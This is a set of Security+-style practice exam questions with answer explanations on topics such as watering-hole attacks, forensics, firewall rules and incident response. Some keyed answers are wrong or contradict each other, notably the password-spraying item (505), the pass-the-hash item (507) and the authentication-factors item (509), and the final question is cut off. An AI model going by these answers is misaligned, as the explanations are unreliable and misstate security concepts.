In a watering-hole attack, attackers target websites that are frequently visited by their intended victims. They compromise these websites with malware, exploiting the trust that users have in them to infect the users’ devices. Here’s why this fits the scenario described:

Watering-hole attack: This technique involves identifying websites that are regularly visited by the target organization or individuals. The attacker then compromises these legitimate websites, injecting them with malicious code. When employees or users visit these infected websites, their devices can become infected with malware, which can lead to further compromise of the organization's network or sensitive information.

Let’s briefly review why the other options are less likely to be correct:

b. Pretexting:

Explanation: Pretexting involves creating a fabricated scenario or pretext to deceive individuals into providing sensitive information or performing certain actions. It does not involve infecting websites with malware to target users.

c. Typosquatting:

Explanation: Typosquatting refers to registering domain names that are similar to legitimate domains, often with typographical errors, to deceive users who mistype URLs. It is not directly related to infecting websites with malware.

d. Impersonation:

Explanation: Impersonation involves pretending to be someone else or a legitimate entity to deceive individuals. It does not necessarily involve infecting websites with malware but rather focuses on deception or fraud through impersonation.

Therefore, based on the scenario described, a. Watering-hole attack is the technique the attacker is using by infecting a frequently visited website to target the company’s employees.

487
Q

A digital forensics team at a large company is investigating a case in which malicious code was downloaded over an HTTPS connection and was running in memory, but was never committed to disk. Which of the following techniques should the team use to obtain a sample of the malware binary?

a. pcap reassembly
b. SSD snapshot
c. Image volatile memory
d. Extract from checksums

A

c. Image volatile memory

Here’s why this technique is suitable:

Image volatile memory: This involves creating a forensic copy (image) of the system's volatile memory (RAM). Malware that is running in memory, such as in this scenario, may leave traces that can be captured in the memory image. Forensic tools are used to extract relevant portions of memory, including the malware code, for analysis and investigation purposes.

Let’s briefly review why the other options are less suitable:

a. pcap reassembly:

Explanation: pcap reassembly involves reconstructing network traffic from captured packets. It focuses on capturing and reconstructing network communications rather than extracting malware binaries from memory.

b. SSD snapshot:

Explanation: Taking an SSD snapshot captures the current state of the storage device. However, since the malware is only in memory and not on disk, this method would not capture the malware binary.

d. Extract from checksums:

Explanation: Extracting from checksums typically involves verifying data integrity using checksum values. It does not apply to extracting malware binaries from volatile memory.

Therefore, c. Image volatile memory is the correct technique for the digital forensics team to use in this scenario to obtain a sample of the malware binary that was downloaded over an HTTPS connection and is running in memory.

488
Q

A website visitor is required to provide properly formatted information in a specific field on a website form. Which of the following security measures is most likely used for this mandate?

a. Input validation
b. Code signing
c. SQL injection
d. Form submission

A

a. Input validation

Input validation is the security measure most likely used for ensuring that a website visitor provides properly formatted information in a specific field on a website form. Here’s why:

Input validation: This process involves checking user input against specified criteria (such as format, length, type, and range) to ensure that it meets expected requirements before processing it further. For example, if a website form requires a phone number in a specific format (e.g., XXX-XXX-XXXX), input validation would check that the entered value matches this format to prevent errors or malicious input.

Let’s briefly review why the other options are less likely to be correct:

b. Code signing:

Explanation: Code signing is used to verify the authenticity and integrity of software code, typically through digital signatures, to ensure it has not been tampered with. It is not directly related to ensuring properly formatted information in a website form.

c. SQL injection:

Explanation: SQL injection is a type of attack where malicious SQL statements are inserted into an entry field for execution. It is a vulnerability rather than a security measure, and it exploits improper input handling rather than enforcing proper formatting.

d. Form submission:

Explanation: Form submission refers to the process of sending data entered into a web form to a server for processing. It is an action rather than a security measure for validating input.

Therefore, a. Input validation is the security measure most likely used to mandate properly formatted information in a specific field on a website form.

489
Q

A technician is setting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is configured, users receive errors stating the website could not be located. Which of the following would best correct the issue?

a. Setting an explicit deny to all traffic using port 80 instead of 443
b. Moving the implicit deny from the bottom of the rule set to the top
c. Configuring the first line in the rule set to allow all traffic
d. Ensuring that port 53 has been explicitly allowed in the rule set

A

d. Ensuring that port 53 has been explicitly allowed in the rule set.

Here’s why this is the correct choice:

Port 53: Port 53 is used for DNS (Domain Name System) traffic. DNS is crucial for resolving domain names (like www.example.com) to IP addresses (like 192.0.2.1) that computers can use to communicate over the internet. If DNS traffic (UDP and TCP on port 53) is blocked by the firewall, users will not be able to resolve domain names to access websites, resulting in errors stating that the website could not be located.

Let’s briefly review why the other options are less likely to correct the issue:

a. Setting an explicit deny to all traffic using port 80 instead of 443:

This option would affect HTTP (port 80) and HTTPS (port 443) traffic differently. However, the issue described doesn't specify a problem with HTTPS traffic (port 443), so blocking port 80 explicitly would not necessarily resolve DNS resolution issues.

b. Moving the implicit deny from the bottom of the rule set to the top:

The implicit deny at the bottom of the rule set typically blocks traffic that does not match any explicitly allowed rules. Moving it to the top would invert the firewall's behavior but wouldn't directly address the DNS issue.

c. Configuring the first line in the rule set to allow all traffic:

Allowing all traffic indiscriminately is not a recommended security practice. It exposes the network to unnecessary risks and doesn't specifically address the DNS resolution issue.

Therefore, d. Ensuring that port 53 has been explicitly allowed in the rule set is the correct approach to ensure that DNS traffic is permitted through the firewall, allowing users to resolve domain names and access websites successfully.

490
Q

A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data classifications should be used to secure patient data?

a. Private
b. Critical
c. Sensitive
d. Public

A

c. Sensitive

Here’s why:

Sensitive data: This classification is used for information that, if disclosed, could result in harm to individuals or the organization. Patient data includes personal and health-related information that is considered sensitive and requires protection under privacy laws and regulations such as HIPAA (Health Insurance Portability and Accountability Act) in the United States.

Let’s briefly review why the other options are less appropriate for securing patient data:

a. Private: While patient data is private, the term “private” is more commonly used to describe personal or confidential information that is not intended for public access. It may not fully encompass the regulatory and security requirements specific to healthcare data.

b. Critical: This classification often refers to data or systems that are essential for the operation of an organization. While patient data is critical to the healthcare provider’s operations, “critical” does not inherently specify the level of sensitivity or privacy associated with healthcare information.

d. Public: This classification applies to information that is intentionally made available to the general public. Patient data is not public and should be protected from unauthorized access and disclosure.

Therefore, c. Sensitive is the most appropriate data classification for securing patient data in a hospital setting.

(Braindump : a. Private)

491
Q

A small business uses kiosks on the sales floor to display product information for customers. A security team discovers the kiosks use end-of-life operating systems. Which of the following is the security team most likely to document as a security implication of the current architecture?

a. Patch availability
b. Product software compatibility
c. Ease of recovery
d. Cost of replacement

A

a. patch availability :

a. Patch availability: End-of-life operating systems no longer receive security patches and updates from the vendor. This leaves the kiosks vulnerable to known and future security vulnerabilities that could be exploited by attackers.

Let’s briefly review why the other options are less likely to be the primary security implication:

b. Product software compatibility: While this could be an issue with upgrading or replacing the operating system, the primary concern from a security standpoint is the lack of security patches rather than software compatibility.

c. Ease of recovery: This typically refers to the ability to recover from a system failure or disaster, which is important but not directly related to the ongoing security risks posed by using an end-of-life operating system.

d. Cost of replacement: While the cost of replacing the kiosks or upgrading their operating systems is a concern for the business, it is not the primary security implication. The focus is on mitigating the security risks associated with running outdated and unsupported software.

Therefore, a. Patch availability is the security implication that the security team would likely document regarding the use of end-of-life operating systems on the kiosks.

492
Q

During a security incident, the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9. A security analyst is creating an inbound firewall rule to block the IP address from accessing the organization’s network. Which of the following fulfills this request?

a. access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32
b. access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0
c. access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0
d. access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32

A

b. access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

Here’s why:

The deny statement is used to block traffic from the specified source IP address (10.1.4.9).
/32 denotes a single IP address in CIDR notation.
destination 0.0.0.0/0 specifies that the denial applies to all destinations (anywhere on the network).

Let’s briefly review why the other options are incorrect:

a. access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32

This rule denies all traffic from any source (0.0.0.0/0) to the specific destination IP (10.1.4.9). It does not target traffic from the specific malicious IP (10.1.4.9) towards any destination, which is the requirement.

c. access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0

This rule permits traffic from the specific source IP (10.1.4.9) to any destination. The requirement is to block, not permit, traffic from this IP address.

d. access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32

This rule permits traffic from any source to the specific destination IP (10.1.4.9). It does not block traffic from the specific malicious IP (10.1.4.9).

Therefore, option b. access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0 is the correct choice to block the IP address 10.1.4.9 from accessing the organization’s network.

493
Q

Which of the following is the phase in the incident response process when a security analyst reviews roles and responsibilities?

a. Preparation
b. Recovery
c. Lessons learned
d. Analysis

A

a. Preparation

During the preparation phase of incident response, roles and responsibilities are typically defined and documented. This includes identifying team members, their responsibilities during an incident, and the escalation paths. This preparation ensures that when an incident occurs, the team knows who is responsible for what actions and can respond effectively.

To summarize:

Preparation: Involves preparing the incident response plan, defining roles and responsibilities, and ensuring the team is ready to respond to incidents.
Recovery: Focuses on restoring systems and services to normal operation after an incident has been contained.
Lessons learned: Takes place after the incident has been resolved, where the team reviews what happened, identifies improvements, and updates the incident response plan.
Analysis: Involves investigating the incident, determining the root cause, and understanding the impact and extent of the incident.

Therefore, a. Preparation is the phase where roles and responsibilities are reviewed and established in the incident response process.

494
Q

An administrator is reviewing a single server’s security logs and discovers the following:

Keywords Date and Time Source Event ID Task Category
Audit Failure 09/16/2022 11:13:05 AM Windows Security 4625 Logon
Audit Failure 09/16/2022 11:13:07 AM Windows Security 4625 Logon
Audit Failure 09/16/2022 11:13:09 AM Windows Security 4625 Logon
Audit Failure 09/16/2022 11:13:11 AM Windows Security 4625 Logon
Audit Failure 09/16/2022 11:13:13 AM Windows Security 4625 Logon
Audit Failure 09/16/2022 11:13:15 AM Windows Security 4625 Logon
Audit Failure 09/16/2022 11:13:17 AM Windows Security 4625 Logon
Audit Failure 09/16/2022 11:13:19 AM Windows Security 4625 Logon
Audit Failure 09/16/2022 11:13:21 AM Windows Security 4625 Logon
Audit Failure 09/16/2022 11:13:23 AM Windows Security 4625 Logon
Audit Failure 09/16/2022 11:13:25 AM Windows Security 4625 Logon
Audit Failure 09/16/2022 11:13:27 AM Windows Security 4625 Logon

Which of the following best describes the action captured in this log file?

a. Brute-force attack
b. Privilege escalation
c. Failed password audit
d. Forgotten password by the user

A

a. brute-force attack.

Brute-force attack (option a): This involves an attacker attempting multiple login combinations systematically to gain unauthorized access to a system or account. The series of consecutive failed logon attempts seen in the log (each attempt occurring every 2 seconds) suggests an automated or manual brute-force attack where the attacker is trying different username/password combinations rapidly.

Privilege escalation (option b): This refers to the process of gaining higher levels of access within a system or network after initially gaining access. It doesn't typically involve repeated failed logon attempts like those seen in the log.

Failed password audit (option c): While there are failed logon attempts, the term "password audit" typically refers to a deliberate review of password strength or compliance rather than the automated or malicious attempts seen in the log.

Forgotten password by the user (option d): This does not fit the scenario because it would not result in repeated failed logon attempts every 2 seconds.

Therefore, the most appropriate description of the action captured in the log file is a. Brute-force attack.

495
Q

Which of the following can be used to identify potential attacker activities without affecting production servers?

a. Honeypot
b. Video surveillance
c. Zero trust
d. Geofencing

A

a. Honeypot

Explanation:

Honeypot: A honeypot is a decoy system or server intentionally exposed to attract attackers. Its purpose is to detect, deflect, or study attempts at unauthorized use of information systems. By observing interactions with the honeypot, security teams can identify potential attacker activities without risking or affecting production servers.

Video surveillance: While video surveillance can be used for physical security monitoring, it does not directly help in identifying potential attacker activities on servers or networks.

Zero trust: Zero trust is a security concept and architectural approach that assumes breach and denies trust by default, regardless of whether the user is inside or outside the network perimeter. It focuses on authenticating and authorizing every request before granting access.

Geofencing: Geofencing is a technology that uses GPS or RFID to define geographical boundaries, and it can be used in security contexts to control access based on the geographic location of devices or users.

Therefore, among the options provided, a. Honeypot is specifically designed to identify potential attacker activities without affecting production servers.

496
Q

A company wants the ability to restrict web access and monitor the websites that employees visit. Which of the following would best meet these requirements?

a. Internet proxy
b. VPN
c. WAF
d. Firewall

A

a. Internet proxy

Explanation:

Internet proxy: An internet proxy server acts as an intermediary between users and the internet. It can be configured to restrict access to certain websites based on policies defined by the company. Additionally, it allows monitoring of the websites visited by employees, providing visibility into their web browsing activities.

VPN (Virtual Private Network): A VPN is used to create a secure and encrypted connection to a private network over the public internet. While it secures communications, it does not inherently restrict or monitor web access unless specific controls are implemented within the VPN solution.

WAF (Web Application Firewall): A WAF is designed to protect web applications from various attacks and vulnerabilities, such as SQL injection and cross-site scripting (XSS). It does not directly restrict or monitor web access for employees.

Firewall: A firewall controls incoming and outgoing network traffic based on predetermined security rules. While it can be configured to block access to certain websites, it does not provide granular monitoring capabilities of web browsing activities.

Therefore, a. Internet proxy is the best option for the company to restrict web access and monitor the websites that employees visit.

497
Q

A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon examining the logs, the analyst identifies a source IP address and blocks that address from communicating with the network. Even though the analyst is blocking this address, the attack is still ongoing and coming from a large number of different source IP addresses. Which of the following describes this type of attack?

a. DDoS
b. Privilege escalation
c. DNS poisoning
d. Buffer overflow

A

a. DDoS (Distributed Denial of Service)

Explanation:

DDoS (Distributed Denial of Service): In a DDoS attack, multiple compromised systems (often thousands or more) are used to flood the target system or network with a large volume of traffic. These attacks typically overwhelm the target's resources, causing it to become slow or completely unavailable to legitimate users. Even if one source IP address is blocked, the attack continues because it originates from many different IP addresses, making it difficult to mitigate.

Privilege escalation: This refers to the unauthorized elevation of privileges within a system or network, typically after an attacker has gained initial access.

DNS poisoning: DNS poisoning involves altering DNS records to redirect traffic to malicious sites.

Buffer overflow: A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary storage) than it was intended to hold, leading to unintended behavior or system crashes.

In the scenario described, where blocking a single IP address does not stop the attack due to traffic coming from various sources, it aligns with the characteristics of a DDoS attack. Therefore, option a. DDoS is the correct answer.

498
Q

A company needs to centralize its logs to create a baseline and have visibility on its security events. Which of the following technologies will accomplish this objective?

a. Security information and event management
b. A web application firewall
c. A vulnerability scanner
d. A next-generation firewall

A

a. Security information and event management (SIEM)

Explanation:

Security information and event management (SIEM): SIEM systems collect, aggregate, and analyze log data from various sources across an organization's IT infrastructure. They provide centralized visibility into security events, allowing for real-time monitoring, correlation of events, and generation of alerts. SIEM systems are essential for creating baselines, detecting anomalies, and responding to security incidents effectively.

Web application firewall: A WAF protects web applications by filtering and monitoring HTTP traffic between a web application and the internet.

Vulnerability scanner: Vulnerability scanners identify security vulnerabilities in systems and applications by scanning them for known weaknesses.

Next-generation firewall: NGFWs integrate traditional firewall capabilities with additional features such as intrusion prevention, application awareness, and advanced threat protection.

Given the company’s need to centralize logs for baseline creation and security event visibility, SIEM is the most appropriate technology as it specializes in log aggregation, analysis, and monitoring across the network.

499
Q

Two organizations are discussing a possible merger. Both organizations’ Chief Financial Officers would like to safely share payroll data with each other to determine if the pay scales for different roles are similar at both organizations. Which of the following techniques would be best to protect employee data while allowing the companies to successfully share this information?

a. Pseudo-anonymization
b. Tokenization
c. Data masking
d. Encryption

A

(community : A 68%, B 16%, C 16%)
a. Pseudo-anonymization

Pseudo-anonymization replaces PII while maintaining financial information for comparison purposes. Data masking replaces financial information with fictitious data, making it unmeaningful for pay scale comparisons between the two organizations. Tokenization replaces financial information with tokens, making it unreadable unless a tokenization system reverses it.

Pseudo-anonymization specifically replaces PII, but keeps everything else the same, so comparisons can be made on the real data that matters.
Tokenization replaces the data with random strings, so no comparisons can be done.
Data masking makes the values fictitious, so the comparisons would be inaccurate. Developers just need data, fictitious or not, so masking works for them.

ChatGPT & Braindump :

b. Tokenization

Explanation:

Tokenization involves replacing sensitive data (such as payroll information) with unique identification symbols (tokens) that retain essential information about the data without compromising its security. The original data is stored securely in a tokenization system, while only the tokens are shared between the organizations. This approach ensures that sensitive information like payroll data remains protected from unauthorized access during transmission and storage.

Let’s briefly look at the other options for clarity:

Pseudo-anonymization: This technique replaces identifiable information with pseudonyms, but it might still be reversible and therefore not as secure as tokenization.

Data masking: Involves hiding original data with a modified version to protect its confidentiality, but it can sometimes be reversible or still provide clues to the original data.

Encryption: While encrypting data is secure, it requires managing encryption keys and may not be as practical for direct data sharing scenarios due to the need for decryption at the receiving end.

Therefore, tokenization is specifically designed to enable secure data sharing while protecting sensitive information like payroll data, making it the best choice for this scenario.

500
Q

A large retail store’s network was breached recently, and this news was made public. The store did not lose any intellectual property, and no customer information was stolen. Although no fines were incurred as a result, the store lost revenue after the breach. Which of the following is the most likely reason for this issue?

a. Employee training
b. Leadership changes
c. Reputation damage
d. Identity theft

A

c. Reputation damage

Explanation:
While the breach did not directly result in fines or loss of intellectual property/customer information, the loss of revenue indicates a broader impact related to reputation damage. Customers may lose trust in the store’s ability to protect their data, which could lead to reduced patronage and, consequently, revenue loss. Reputation damage is a common consequence of security breaches and can significantly impact a company’s bottom line even when direct financial losses are not incurred.

501
Q

A government organization is developing an advanced Al defense system. Developers are using information collected from third-party providers. Analysts are noticing inconsistencies in the expected progress of the Al learning and attribute the outcome to a recent attack on one of the suppliers. Which of the following is the most likely reason for the inaccuracy of the system?

A. Improper algorithms security
B. Tainted training data
C. Fileless virus
D. Cryptomalware

A

B. Tainted training data

Explanation:
The inconsistencies in the expected progress of the AI learning are likely due to tainted training data from a recent attack on one of the suppliers. When the training data used to train AI systems is compromised or manipulated (often inadvertently through attacks like data breaches or supply chain attacks), it can lead to inaccurate AI model outputs and behaviors. Therefore, in this scenario, the most likely reason for the inaccuracies in the AI defense system is the tainted training data resulting from the attack on the supplier.

502
Q

A company’s help desk has received calls about the wireless network being down and users being unable to connect to it. The network administrator says all access points are up and running. One of the help desk technicians notices the affected users are working in a building near the parking lot. Which of the following is the most likely reason for the outage?

A. Someone near the building is jamming the signal.
B. A user has set up a rogue access point near the building.
C. Someone set up an evil twin access point in the affected area.
D. The APs in the affected area have been unplugged from the network.

A

A. Someone near the building is jamming the signal.

Explanation:
The symptoms described — users near a specific area (building near the parking lot) unable to connect to the wireless network while the access points (APs) appear operational — suggest that the wireless signal in that area is being jammed. Jamming refers to intentional interference with wireless signals, which can disrupt or block connectivity.

Here’s why the other options are less likely:

B. A user has set up a rogue access point near the building: While possible, rogue access points usually affect connectivity differently, often by causing conflicts or interference due to overlapping signals. They do not necessarily cause complete outages unless they are disrupting the network significantly.
C. Someone set up an evil twin access point in the affected area: An evil twin AP mimics a legitimate AP to trick users into connecting to it, but it typically does not cause a complete outage unless users connect to it and are subjected to some form of attack or redirection.
D. The APs in the affected area have been unplugged from the network: If APs were unplugged, they would not be operational at all, and users would not detect them as available networks.

Therefore, given the symptoms described (partial outage in a specific area despite APs being up), the most likely cause is deliberate signal jamming affecting the wireless network in that area.

503
Q

Which of the following can best protect against an employee inadvertently installing malware on a company system?

A. Host-based firewall
B. System isolation
C. Least privilege
D. Application allow list

A

D. Application allow list

Explanation:

Application allow list: This security measure restricts the applications that can be installed and run on a system to a predefined list of approved applications. By doing so, it prevents employees from inadvertently installing malware or unauthorized software, as only the applications on the allow list can be executed.

Host-based firewall: While useful for controlling network traffic to and from the host, a firewall does not prevent the installation of malware. It can block malicious traffic but doesn't address the issue of unauthorized software installation.

System isolation: This involves separating systems or segments of a network to limit the spread of malware. While helpful for containing an infection, it does not prevent the initial installation of malware.

Least privilege: This principle involves giving users the minimum level of access necessary to perform their job functions. While it reduces the risk of malware installation by limiting what users can do, it is not as direct or effective as an application allow list in preventing the installation of unauthorized software.

Therefore, an application allow list provides the most direct and effective protection against the inadvertent installation of malware by employees.

504
Q

An information security officer at a credit card transaction company is conducting a framework-mapping exercise with the internal controls. The company recently established a new office in Europe. To which of the following frameworks should the security officer map the existing controls? (Choose two.)

A. ISO
B. PCIDSS
C. SOC
D. GDPR
E. CSA
F. NIST

A

B. PCIDSS (Payment Card Industry Data Security Standard): PCIDSS is essential for any organization handling credit card transactions, ensuring secure handling of cardholder information.

D. GDPR (General Data Protection Regulation): GDPR is crucial for compliance with data protection and privacy regulations in the European Union, especially since the company has established an office in Europe.

Explanation:

PCIDSS: Since the company deals with credit card transactions, compliance with PCIDSS is mandatory to secure cardholder data and ensure secure payment processing.
GDPR: With the new office in Europe, compliance with GDPR is necessary to protect personal data and ensure privacy rights of individuals within the EU.

These frameworks address specific regulatory requirements related to data protection, privacy, and secure payment processing, which are critical for the company’s operations in Europe.

505
Q

A customer called a company’s security team to report that all invoices the customer has received over the last five days from the company appear to have fraudulent banking details. An investigation into the matter reveals the following:

The manager of the accounts payable department is using the same password across multiple external websites and the corporate account. One of the websites the manager used recently experienced a data breach. The manager’s corporate email account was successfully accessed in the last five days by an IP address located in a foreign country.

Which of the following attacks has most likely been used to compromise the manager’s corporate account?

A. Remote access Trojan
B. Brute-force
C. Dictionary
D. Credential stuffing
E. Password spraying

A

E. Password spraying.

Here’s why:

Password Reuse: The manager used the same password across multiple external websites and the corporate account. This practice is risky because if one site is compromised, attackers can use the same credentials to access other accounts.
Data Breach: One of the external websites the manager used recently experienced a data breach. This means that the manager's credentials used on that site could have been exposed.
Successful Access from Foreign IP: The manager's corporate email account was accessed successfully from an IP address located in a foreign country. This suggests unauthorized access likely gained through compromised credentials.

Password Spraying involves using a single password across multiple accounts or services, rather than attempting to brute-force a single account. Attackers try common or previously exposed passwords against multiple accounts, leveraging the likelihood that users reuse passwords across different services. In this scenario, the compromised credentials from the breached external website were likely used in a password spraying attack against the corporate email account, resulting in unauthorized access.

Therefore, the most likely attack used to compromise the manager’s corporate account, given the details provided, is E. Password spraying.

Let’s review why the other answers are not as suitable as Password spraying for describing the attack that compromised the manager’s corporate account:

Remote access Trojan (A): A Remote Access Trojan (RAT) is malicious software that allows an attacker to control a system remotely. While RATs can be used to gain unauthorized access to systems, they are typically not directly linked to the compromise of a corporate account through password reuse or exposure in a data breach.

Brute-force (B): Brute-force attacks involve systematically trying all possible combinations of passwords until the correct one is found. This method is less likely in this scenario because the attack did not involve trying many different passwords against a single account, but rather using a known compromised password across multiple accounts.

Dictionary (C): Dictionary attacks involve using a list of commonly used passwords or words from a dictionary to attempt to gain unauthorized access. This approach is similar to brute-force attacks but focuses on commonly used or easily guessable passwords. It does not directly fit the scenario where a specific compromised password is reused across accounts.

Credential stuffing (D): Credential stuffing involves using large sets of known username and password pairs to gain unauthorized access to accounts. It is typically used against a specific service or website, leveraging credentials obtained from previous data breaches. While similar in concept to password spraying, credential stuffing usually involves automated attempts against a single service, not multiple services.

In contrast, Password spraying specifically fits the scenario where the manager reused the same password across multiple accounts, including an external website that was breached. Attackers took advantage of this password reuse to gain unauthorized access to the manager’s corporate account, which aligns with the details provided in the scenario.

Therefore, E. Password spraying remains the most appropriate answer given the context provided in the question.

506
Q

An organization’s corporate offices were destroyed due to a natural disaster, so the organization is now setting up offices in a temporary work space. Which of the following will the organization most likely consult?

A. The business continuity plan
B. The risk management plan
C. The communication plan
D. The incident response plan

A

A. The business continuity plan

Business continuity plans (BCP) are designed to ensure that critical business functions can continue during and after a disaster or disruption. They typically include strategies for relocating operations to alternative facilities, maintaining essential services, and recovering from the disruption. Given that the organization needs to resume its operations in a temporary workspace after the destruction of its corporate offices, consulting the business continuity plan will provide guidance on how to maintain continuity and minimize the impact of the disaster on business operations.

The other options:

B. The risk management plan: While important for assessing and mitigating risks, it doesn't directly address the immediate need to resume operations after a disaster.
C. The communication plan: Important for internal and external communications during incidents, but doesn't address the overall operational recovery.
D. The incident response plan: Focuses on responding to and managing specific incidents as they occur, rather than on long-term operational continuity after a major disaster.

Therefore, A. The business continuity plan is the most appropriate plan for the organization to consult in this situation.

507
Q

Security analysts notice a server login from a user who has been on vacation for two weeks. The analysts confirm that the user did not log in to the system while on vacation. After reviewing packet capture logs, the analysts notice the following:

username : ….smithJA….
Password: 944d369d8880ed401b5ba2c77811

Which of the following occurred?

A. A buffer overflow was exploited to gain unauthorized access.
B. The user’s account was compromised, and an attacker changed the login credentials.
C. An attacker used a pass-the-hash attack to gain access.
D. An insider threat with username smithJA logged in to the account.

A

(Braindump : C. An attacker used a pass-the-hash attack to gain access.)

Based on the provided information:

A user (smithJA) logged into the system while they were confirmed to be on vacation, indicating a potential unauthorized access.
The login credentials shown in the packet capture log (username and hashed password) suggest that the account may have been compromised.

Given these points, the most likely scenario is:

B. The user’s account was compromised, and an attacker changed the login credentials.

This aligns with the suspicious login activity during the user’s absence and the presence of login credentials in the packet capture log that do not match what the legitimate user typically uses.

508
Q

A security analyst is taking part in an evaluation process that analyzes and categorizes threat actors of real-world events in order to improve the incident response team’s process. Which of the following is the analyst most likely participating in?

A. MITRE ATT&CK
B. Walk-through
C. Red team
D. Purple team
E. TAXII

A

A. MITRE ATT&CK

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a knowledge base of adversary tactics and techniques based on real-world observations. It categorizes and describes various techniques used by threat actors during cyber attacks. Security analysts often use MITRE ATT&CK to understand and classify these tactics, which helps in improving incident response strategies and defenses.

509
Q

A network manager wants to protect the company’s VPN by multifactor authentication that uses:
Something you know
Something you have
Somewhere you are
Which of the following would accomplish the manager’s goal?

A. Domain name. PKI, GeoIP lookup
B. VPN IP address, company ID. partner site
C. Password, authentication token, thumbprint
D. Company URL, TLS certificate, home address

A

C. Password, authentication token, thumbprint

Explanation:

Password: Something you know.
Authentication token: Something you have.
Thumbprint: This could refer to biometric data like a fingerprint, which could be considered as part of "somewhere you are" if it implies physical presence (though this interpretation may vary).

Option C covers two out of the three factors explicitly mentioned (something you know and something you have). For the “somewhere you are” factor, typically GeoIP lookup or GPS location would be used, but it’s not directly covered in the provided options.

510
Q

Which of the following terms should be included in a contract to help a company monitor the ongoing security maturity of a new vendor?

A. A right-to-audit clause allowing for annual security audits
B. Requirements for event logs to be kept for a minimum of 30 days
C. Integration of threat intelligence in the company’s AV
D. A data-breach clause requiring disclosure of significant data loss

A

A. A right-to-audit clause allowing for annual security audits

Explanation:

A "right-to-audit" clause in a contract allows the company to conduct regular security audits of the vendor's systems and processes.
This helps the company monitor the ongoing security maturity of the vendor by assessing their adherence to security policies, procedures, and controls.
It ensures transparency and accountability in the vendor's security practices, which is crucial for maintaining trust and ensuring compliance with security standards.

Options B, C, and D are not directly related to monitoring the ongoing security maturity of the vendor. While they are important considerations for security in general, they do not specifically address the need to continuously assess and improve the vendor’s security posture over time.

511
Q

Which of the following cloud models provides clients with servers, storage, and networks but nothing else?

A. SaaS
B. PaaS
C. IaaS
D. DaaS

A

C. IaaS

Explanation:

IaaS (Infrastructure as a Service) provides clients with virtualized computing resources over the internet. This includes servers, storage, and networking infrastructure, allowing clients to run their own applications, operating systems, and software.
With IaaS, clients are responsible for managing applications, data, runtime, middleware, and operating systems. The cloud provider manages the infrastructure components such as virtualization, servers, storage, and networking.
This model gives clients flexibility and control over their IT resources without the burden of managing physical hardware.
512
Q

A marketing coordinator is trying to access a social media application on a company laptop but is getting blocked. The coordinator opens a help desk ticket to report the issue. Which of the following documents should a security analyst review to determine whether accessing social media applications on a company device is permitted?

A. Incident response policy
B. Business continuity policy
C. Change management policy
D. Acceptable use policy

A

D. Acceptable use policy

Explanation:

An Acceptable Use Policy (AUP) outlines what is considered acceptable behavior by users of a company's IT resources, including computers, networks, and the internet.
AUPs typically define which applications and websites employees are allowed to access while using company-owned devices and networks.
Reviewing the AUP will help determine whether accessing social media applications on a company device is permitted or prohibited.
513
Q

Law enforcement officials sent a company a notification that states electronically stored information and paper documents cannot be destroyed. Which of the following explains this process?

A. Data breach notification
B. Accountability
C. Legal hold
D. Chain of custody

A

C. Legal hold

Explanation:

Legal hold is a process in which an organization is instructed to preserve all relevant electronic and paper documents related to a legal matter or investigation.
This process ensures that potentially relevant information is not destroyed or altered, which could be critical in legal proceedings.
It is common for law enforcement or legal authorities to issue a legal hold notice to ensure preservation of evidence or information pertinent to an ongoing investigation or legal case.

Legal hold and chain of custody are both important concepts in the context of legal proceedings and investigations, but they serve different purposes:

Legal Hold:
    Purpose: Legal hold (also known as litigation hold or preservation order) is a directive issued to an organization to preserve all relevant documents and information related to a legal matter.
    Scope: It applies broadly to all potentially relevant electronic and paper documents, data, and information.
    Timing: It is typically issued at the onset of legal proceedings or when a legal matter is anticipated, requiring immediate action to prevent spoliation (destruction or alteration) of evidence.

Chain of Custody:
    Purpose: Chain of custody refers to the chronological documentation or paper trail that records the handling, transfer, and location of physical evidence or digital data during an investigation or legal proceeding.
    Scope: It specifically tracks the movement and possession of evidence from the moment it is collected until it is presented in court.
    Documentation: It includes detailed records of who had custody of the evidence, when and where it was transferred, and any actions taken while in possession.

Key Differences:

Focus: Legal hold focuses on the preservation of information and documents that might be relevant to a legal matter, ensuring they are not destroyed.
Documentation: Chain of custody focuses on documenting the handling and movement of physical evidence or digital data to maintain its integrity and admissibility in court.
Legal Implications: Legal hold is about compliance with legal directives to preserve information, while chain of custody ensures the integrity and reliability of evidence for legal proceedings.

In summary, legal hold ensures preservation of information, while chain of custody ensures the integrity and reliability of evidence used in legal proceedings. Both are crucial in different stages of handling legal matters and investigations.

514
Q

A company wants to deploy decoy systems alongside production systems in order to entice threat actors and to learn more about attackers. Which of the following best describes these systems?

A. DNS sinkholes
B. Honeypots
C. Virtual machines
D. Neural networks

A

B. Honeypots

Explanation:
Honeypots are decoy systems or resources intentionally deployed within a network to attract and deceive attackers. They appear to be legitimate systems but are isolated and monitored separately from production systems. The goal of honeypots is to gather information about attackers’ methods, tools, and motives without exposing critical infrastructure or data. This information can then be used to enhance threat intelligence and improve overall security posture by understanding potential attack vectors and vulnerabilities. Therefore, deploying honeypots aligns with the company’s objective to learn more about attackers while protecting their production systems.

515
Q

A company’s help desk received several AV alerts indicating Mimikatz attempted to run on the remote systems. Several users also reported that the new company flash drives they picked up in the break room only have 512KB of storage. Which of the following is most likely the cause?

A. The GPO prevents the use of flash drives, which triggers a false positive AV indication and restricts the drives to only 512KB of storage.

B. The new flash drives need a driver that is being blocked by the AV software because the flash drives are not on the application’s allow list, temporarily restricting the drives to 512KB of storage.

C. The new flash drives are incorrectly partitioned, and the systems are automatically trying to use an unapproved application to repartition the drives.

D. The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memory.

A

